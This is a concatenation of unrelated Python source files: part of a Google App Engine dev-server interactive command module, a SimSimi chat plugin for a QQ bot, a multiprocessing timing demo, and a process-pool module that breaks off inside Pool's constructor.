python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
    used when constructing "SERVER_PORT" in the WSGI environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
        # If the instance is restarted while handling a request then the
        # exception raised is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
      return ['The command timed out while waiting for another command to complete']
def restart(self):
"""Restarts the the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
      raise InteractiveCommandError('Unexpected command failure: %s' % e)
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
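  # Usage sketch (illustrative, not part of the original module): given a
  # fully constructed InteractiveCommandModule `icm` (its constructor
  # arguments mirror Module's), a caller evaluates code like this:
  #
  #   try:
  #     output = icm.send_interactive_command('print 5+5')  # e.g. "10\n"
  #   except InteractiveCommandError as e:
  #     logging.error('Command failed: %s', e)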
|
simsimi.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : cold
# E-mail : wh_linux@126.com
# Date : 14/01/16 11:33:32
# Desc   : SimSimi plugin
#
import json
from tornadohttpclient import TornadoHTTPClient
import config
import random
from plugins import BasePlugin
class SimSimiTalk(object):
""" 模拟浏览器与SimSimi交流
:params http: HTTP 客户端实例
:type http: ~tornadhttpclient.TornadoHTTPClient instance
"""
def __init__(self, http = None):
self.http = http or TornadoHTTPClient()
if not http:
self.http.set_user_agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.71 Chrome/28.0.1500.71 Safari/537.36")
self.http.debug = getattr(config, "TRACE", False)
self.http.validate_cert = False
self.http.set_global_headers({"Accept-Charset": "UTF-8,*;q=0.5"})
self.url = "http://www.simsimi.com/func/req"
self.params = {"lc":"zh", "ft":0.0}
self.ready = False
self.fetch_kwargs = {}
if config.SimSimi_Proxy:
self.fetch_kwargs.update(proxy_host = config.SimSimi_Proxy[0],
proxy_port = config.SimSimi_Proxy[1])
self._setup_cookie()
def _setup_cookie(self):
def callback(resp):
self.ready = True
self.http.get("http://www.simsimi.com", callback = callback)
def talk(self, msg, callback):
""" 聊天
:param msg: 信息
:param callback: 接收响应的回调
"""
headers = {"Referer":"http://www.simsimi.com/talk.htm",
"Accept":"application/json, text/javascript, */*; q=0.01",
"Accept-Language":"zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
"Content-Type":"application/json; charset=utf-8",
"X-Requested-With":"XMLHttpRequest",
}
if not msg.strip():
return callback(u"小的在")
params = {"msg":msg.encode("utf-8")}
params.update(self.params)
def _talk(resp):
data = {}
if resp.body:
try:
data = json.loads(resp.body)
except ValueError:
pass
            # SimSimi returns its reply under the "response" key
            callback(data.get("response"))
self.http.get(self.url, params, headers = headers,
callback = _talk)
class SimSimiPlugin(BasePlugin):
simsimi = None
def is_match(self, form_uin, content, type):
if not getattr(config, "SimSimi_Enabled", False):
return False
else:
self.simsimi = SimSimiTalk()
if type == "g" and random.choice('abcd')!='a':
if self.nickname !=None:
if content.startswith(self.nickname.strip()) or \
content.endswith(self.nickname.strip()) or \
content.startswith(config.QQ_GROUP_NICK.strip()) or \
content.endswith(config.QQ_GROUP_NICK.strip()) or \
content.startswith('@'+config.QQ_GROUP_NICK.strip()) or \
content.endswith('@'+config.QQ_GROUP_NICK.strip()):
                    # str.strip(chars) removes *characters*, not a prefix or
                    # suffix, so peel off the matched nickname explicitly.
                    stripped = content
                    for name in (self.nickname.strip(),
                                 config.QQ_GROUP_NICK.strip(),
                                 '@' + config.QQ_GROUP_NICK.strip()):
                        if name and stripped.startswith(name):
                            stripped = stripped[len(name):]
                        if name and stripped.endswith(name):
                            stripped = stripped[:-len(name)]
                    self.content = stripped.strip()
                    return True
else:
return False
else:
self.content = content
return True
return False
def handle_message(self, callback):
self.simsimi.talk(self.content, callback)
if __name__ == "__main__":
import threading,time
simsimi = SimSimiTalk()
def callback(response):
print response
simsimi.http.stop()
def talk():
while 1:
if simsimi.ready:
simsimi.talk("nice to meet you", callback)
break
else:
time.sleep(1)
t = threading.Thread(target = talk)
t.setDaemon(True)
t.start()
simsimi.http.start()
|
multiproc1.py
|
# multiproc1.py: Illustrate parallel processes
from multiprocessing import Process
import time
def fib(n):
last,curr = 0,1
return n if n in (last,curr) else fib(n-1) + fib(n-2)
if __name__ == '__main__': # This is important! (Launched process imports this module)
# First, do serial calls
start = time.perf_counter()
for n in range(10):
fib(31)
stop = time.perf_counter()
print('serially:',stop-start)
# Now in parallel (there will be some blocking, since 10 > #cpus)
procs = []
start = time.perf_counter()
for n in range(10):
proc = Process(target=fib,args=(31,))
procs.append(proc) # Keep process object to join later
proc.start() # Launch process
for proc in procs:
proc.join() # Wait for each process to finish
stop = time.perf_counter()
print('concurrently:',stop-start)
'''
serially: 9.321782736
concurrently: 5.4984390990000005
'''
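# Sketch: the same workload with a process pool (standard library
# multiprocessing.Pool; not part of the original example).  A pool reuses
# a fixed set of worker processes instead of forking one per call.
from multiprocessing import Pool

if __name__ == '__main__':
    start = time.perf_counter()
    with Pool() as pool:                # defaults to os.cpu_count() workers
        pool.map(fib, [31] * 10)        # distribute the 10 calls over the pool
    stop = time.perf_counter()
    print('pooled:', stop - start)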
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import (
TERM_SIGNAL, human_status, pickle_loads, reset_signals, restart_state,
)
from .compat import get_errno, mem_rss, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
MAXMEM_USED_FMT = """\
child process exiting after exceeding memory limit ({0}KiB / {1}KiB)
"""
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
    # handled by any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = TERM_SIGNAL
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
util.get_logger().error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value)
self._initial_value = value
def grow(self):
with self._cond:
self._initial_value += 1
self._value += 1
self._cond.notify()
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
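# Role sketch (illustrative, not part of the original module): the pool
# acquires one slot per in-flight job and releases it on acknowledgement,
# while grow()/shrink() track pool resizes:
#
#   sem = LaxBoundedSemaphore(2)    # two workers
#   sem.acquire(); sem.acquire()    # two jobs in flight (value: 0)
#   sem.grow()                      # third worker added (value: 1, bound: 3)
#   sem.release(); sem.release()    # both jobs done (value: 3)
#   sem.release()                   # excess release is ignored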
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, str(self))
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
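# How the soft limit surfaces in user code (sketch): the pool sends
# SIG_SOFT_TIMEOUT to the worker, the handler above raises
# SoftTimeLimitExceeded inside the running task, and the task may catch it
# to clean up before the hard limit terminates the process.  `crunch` and
# `cleanup` below are hypothetical:
#
#   def task(path):
#       try:
#           return crunch(path)
#       except SoftTimeLimitExceeded:
#           cleanup(path)
#           raise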
#
# Code run by worker processes
#
class Worker(object):
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True,
max_memory_per_child=None):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self.max_memory_per_child = max_memory_per_child
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
max_memory_per_child = self.max_memory_per_child or 0
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
if max_memory_per_child > 0:
used_kb = mem_rss()
if used_kb <= 0:
error('worker unable to determine memory usage')
if used_kb > 0 and used_kb > max_memory_per_child:
error(MAXMEM_USED_FMT.format(
used_kb, max_memory_per_child))
return EX_RECYCLE
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
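    # Message protocol implemented by workloop() above (descriptive only):
    #   inqueue  -> worker:  (TASK,  (job, i, fun, args, kwargs))
    #   worker -> outqueue:  (ACK,   (job, i, time_accepted, pid, synqW_fd))
    #                        (READY, (job, i, (ok, value_or_ExceptionInfo), inqW_fd))
    #                        (DEATH, (pid, exitcode))   # on exit, POSIX only
    #   synqueue -> worker:  (ACK, ...) or (NACK, ...)  # only with a syn queue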
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
                except Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), TERM_SIGNAL)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
            # Keep maintaining workers until the cache gets drained, unless
            # the pool is terminated.
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool, cache):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
self.cache = cache
super(TaskHandler, self).__init__()
def body(self):
cache = self.cache
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
task = None
i = -1
try:
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
except Exception:
job, ind = task[:2]
try:
cache[job]._set(ind, (False, ExceptionInfo()))
except KeyError:
pass
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception:
job, ind = task[:2] if task else (0, 0)
if job in cache:
cache[job]._set(ind + 1, (False, ExceptionInfo()))
if set_length:
util.debug('doing set_length()')
set_length(i + 1)
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
if os.getpgid(worker.pid) == worker.pid:
debug("worker %s is a group leader. It is safe to kill (SIGTERM) the whole group", worker.pid)
os.killpg(os.getpgid(worker.pid), signal.SIGTERM)
else:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
if os.getpgid(worker.pid) == worker.pid:
debug("worker %s is a group leader. It is safe to kill (SIGKILL) the whole group", worker.pid)
os.killpg(os.getpgid(worker.pid), signal.SIGKILL)
else:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
max_memory_per_child=None,
enable_timeouts=False,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._max_memory_per_child = max_memory_per_child
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
self.enable_timeouts = bool(
enable_timeouts or
self.timeout is not None or
self.soft_timeout is not None
)
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
class Process(self._ctx.Process):
_controlled_termination = False
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
self._Process = Process
self._pool = []
self._poolctrl = {}
